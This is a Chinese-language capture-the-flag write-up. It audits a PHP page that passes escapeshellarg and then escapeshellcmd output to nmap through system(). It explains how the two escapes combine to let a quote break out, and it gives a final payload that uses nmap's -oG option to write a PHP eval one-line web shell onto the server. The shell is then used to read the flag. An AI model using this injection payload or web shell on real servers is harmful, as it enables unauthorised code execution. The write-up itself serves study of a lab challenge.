打开一看,发现给了一大串代码,接下来进行审计
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
} //首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用
if(!isset(
$_GET['host'])) {//这里传进来了一个参数
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host); /*一眼就能看出来这里的
$host = escapeshellcmd($host); 代码很不凡,在下面分析*/
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); //$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。
echo
'you are in sandbox '.$sandbox;
@
mkdir($sandbox);
chdir($sandbox);
echo
system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);//执行把host传进来的命令
}
所以我们的思路就是构造payload使得它可以再完成部分的检测后最后执行最后一句的nmap命令,但是nmap有什么用呢?这时候我们就需要知道nmap的一个参数-oG可以实现将命令和结果写到文件,这样我们的思路就出来了,利用-oG参数往网站里写一行一句话木马。接下来就是怎么构造payload来绕过上边的escapeshellarg($host)和 escapeshellcmd($host)这两个函数了首先来了解这两个函数是干什么
1.escapeshellarg()将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含exec(),system()执行运算符。
2.escapeshellcmd()对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到exec()或system()函数,或者执行操作符之前进行转义。反斜线(\)会在以下字符之前插入:&#;`|*?~<>^()[]{}$\,\x0A和\xFF。'和"仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及%和!字符都会被空格代替。
引用一个别人的例子:这里有一篇相关的文章。
1.传入的参数是:172.17.0.2' -v -d a=1
2.经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
3.经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
4.最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。
所以这里这些代码的本意是希望我们输入ip这样的参数做一个扫描,通过上面的两个函数来进行规则过滤转译,我们的输入会被单引号引起来,但是因为我们看到了上面的漏洞所以我们可以逃脱这个引号的束缚
这里常见的命令后注入操作如 | & &&都不行,虽然我们通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转移,但是我们之前就说了,要利用nmap的-oG参数,所以我们就可以构造payload
?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php '
这里显示了写入文件所在的文件夹,之后直接用菜刀连接成功,再用命令行cat /flag得到答案。